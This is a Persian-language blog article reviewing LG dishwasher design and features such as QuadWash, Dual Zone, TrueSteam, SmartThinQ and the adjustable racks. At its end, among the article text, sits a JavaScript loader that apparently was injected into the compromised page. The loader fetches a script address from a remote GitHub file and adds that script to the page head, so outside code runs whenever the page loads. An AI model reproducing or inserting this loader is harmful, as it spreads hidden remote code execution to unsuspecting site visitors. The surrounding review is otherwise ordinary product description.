دسته‌بندی نشده

بررسی ماشین ظرفشویی های ال جی

نحوه طراحی ماشین ظرفشویی های ال جی 


ماشین ظرفشویی های ال جی معمولا در سه استایل مختلف طراحی و دیزاین می شوند. در استایل اول دسته به صورت توکار و پنل و ننظیمات به صورت مخفی روی ان یا در قسمت داخلی بالا درب دیزان می شود. نوع دوم درب ان به صورت نواری با یک دسته توکار و پنل مخفی بالا و یا در قسمت داخلی ان دیزان شده است و در استایل سوم دسته درب به صورت نواری با یک گیره داخل ان جهت باز کردن درب و پنل و دکمه ها بالای ان طراحی می شوند. ظرفشویی های ال جی در رنگ های مختلف و اغلب در رنگ مشکی و سیلور طراحی می شوند و دارای بدنه های مقاوم از جنس استیل ضد لک و ضد اثر انگشت می باشند. با طراحی مدرنی که ظرفشویی های ال جی دارند دکوراسیون محیط به حد قابل توجهی ارتقا می یابد و بسیار شیک تر از قبل به نظر خواهد رسید. 

بررسی قابلیت ها و امکانات


کمپانی ال جی در تولید محصولات خود هر ساله قدم های بیشتری رو به جلو بر می دارد و محصولات خود را با امکانات و قابلیت های جدید و پیشرفته تر و با فناوری های بروز تر عرضه می کند. امروزه کاربران شاهد تغییراتی عظیم و فوق العاده ای در این محصولات از نظر طراحی و عملکرد می باشند. 

QuadWash 


اگر از افرادی هستید که در شستشو ظروف وسواس دارید و دائما نگران این هستید که برخی از ظروف به خوبی در ظرفشویی تمییز نمی شوند ال جی این مشکل را با ارائه قابلیت QuadWash برای محصولاتش به طور کامل از بین برده است. چهار دسته شستشو با قابلیت حرکت در جهات مختلف و تکمیل شده با جت های اسپری کننده اب در محصولات ال جی تعبیه شده اند. دسته ها چند حرکتی هنگام انجام شستشو در جهات مختلف برای اطمینان از شستشو بهینه برای تمامی قسمت ها به حرکت در می ایند و همچنین جت های اسپری کننده اب را با فشار های مختلف به ظروف می رسانند بنابراین چرخه شستشو با سرعت بیشتر انجام می شود و ظروف به صورتی عالی شستشو داده می شوند. 

Dual Zone


قرار دادن ظروف شیشه ای ظریف داخل ظرفشویی کاری پر استرس و نگران کننده برای افراد می باشد چراکه امکان دارد با سرعت بالایی که اب داخل ظرفشویی اسپری می شود ظروف بشکنند و از بین بروند. با قابلیت Dual Zone در ماشین ظرفشویی های ال جی می توانید از شدت اسپری اب متفاوتی برای هر دو قسمت بالا ( با شدت کم ) و پایین ( با شدت بالا و تند )استفاده کنید. به این معنا که می توانید تمامی ظروف چرب و بسیار کثیف را در قسمت پایین و ظروف شیشه ای و نازک را در قسمت بالا برای ایجاد شستشو بهینه برای هر دو به صورت همزمان قرار دهید. 

TrueSteam™


از بین بردن غذا های مانده روی ظروف می توانند بسیار سخت و طاقت فرسا باشد و بسیاری از ظرفشویی ها نمی توانند از عهده پاک کردن ان ها بر ایند. با تعبیه قابلیت TrueSteam™ شستشو با بخار بر روی ماشین ظرفشویی های ال جی دیگر نیازی به انجام چرخه پیش شستشو برای ظروف نمی باشد و تنها با انجام یک چرخه شستشو با استفاده از بخار لکه های باقی مانده و سخت روی ظروف به صورت کامل از بین خواهند رفت. در این تکنولوژی با استفاده از دریچه های کوچک بخار در تمامی قسمت ها ظرفشویی جهت از بین رفتن چربی های روی ان پخش می شود.با این ویژگی در مصرف اب و انرژی صرفه جویی می شود و همچنین نیازی به انجام چرخه ابکشی برای ظروف نمی باشد. 

تکنولوژی های هوشمند 


کنترل و انجام تنظیمات روی ماشین لباسشویی های ال جی با استفاده از قابلیت های موجود روی ان به صورتی بسیار اسان تر از گذشته صورت می گیرد. در این قابلیت ها با استفاده از اپلیکیشن های مختلف و با استفاده از گوشی های هوشمند می توان کنترل دستگاه را از راه دور نیز در دسترس داشت. 

NFC


در ماشین ظرفشویی های ال جی از تکنولوژی NFC-Tag استفاده می شود. در این تکنولوژی امکان دانلود چرخه های مختلف از طریق گوشی هوشمند و تگ کردن ان ها روی ظرفشویی با نگهداشتن گوشی در نزدیکی دستگاه وجود دارد. با این قابلیت چرخه های مورد نیاز کاربران به اسانی روی ظرفشویی قابل اجرا می باشند و طیف گسترده ای ویژگی های مختلف برای ان تعبیه خواهد شد. 

SmartThinQ


ماشین ظرفشویی های میان رده و بالا رده ال جی دارای قابلیت پیشرفته SmartThinQ می باشند که به شما امکان می دهد تا تمامی دستگاه هایی را که به وای-فای دسترسی دارند با استفاده از اپلیکیشن مخصوص کنترل کنید. SmartThinQ با استفاده از الارم به شما اطلاع می دهد که چرخه شستشو به پایان رسیده است که بسیار کاربردی برای افرادی است که وقت زیادی برای ایستادن در کنار ظرفشویی و چک کردن مرتب ان تا زمان اتمام چرخه را ندارند. این قابلیت همچنین جهت کنترل کردن ظرفشویی با استفاده از صدا کاربران توسط دستیار های صوتی گوگل و الکسا استفاده می شود.

SmartDiagnosis


هنگامی که مشکلی در دستگاه ها ایجاد می شود برطرف کردن ان کاری دشوار و سخت می باشد. با این قابلیت ماشین ظرفشویی می تواند مشکل را به اسانی تشخیص دهد و جهت بر طرف کردن ان با پشتیبانی ال جی ارتباط بر قرار کند. 

Inverter Direct Drive


با این موتور بسیار عالی دستگاه با 10 سال گارانتی کمپانی ال جی عرضه می شود. اینورتر دایرکت درایو دارای مصرف انرژی پایین و سرو صدا کمی است و همچنین مقاومت فوق العاده بالایی دارد. 

ویژگی های استفاده شده در قسمت داخلی 

EasyRackPlus 


با ظرفشویی های ال جی دیگر دچار کمبود فضا برای قرار دادن اقلام نخواهید بود. قابلیت EasyRackPlus با استفاده از سه قسمت مختلف فضای بسیار زیادی را برای شستشو ظروف مختلف داخل ماشین ظرفشویی ایجاد می کند. 

-قفسه پایین : در قفسه پایین از دنده های قابل تنظیم استفاده شده است که کاربران می توانند با توجه به ظروف خود ان را در اندازه مورد نیاز تنظیم کنند. 

-قفسه بالا : قفسه بالا به اسانی قابل جابجایی برای ایجاد فضای بیشتر برای قسمت پایین جهت قرار دادن ظروف بزرگ مانند قابلمه و ظروف پخت و پز می باشد. 

-قفسه سوم : این قفسه نیز قابل تنظیم می باشد و بلندی ان به اسانی تنظیم خواهد شد بنابراین می توان اقلام کوچک, قاشق و چنگال و همچنین فنجان های قهوه را روی ان شستشو داد. 

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *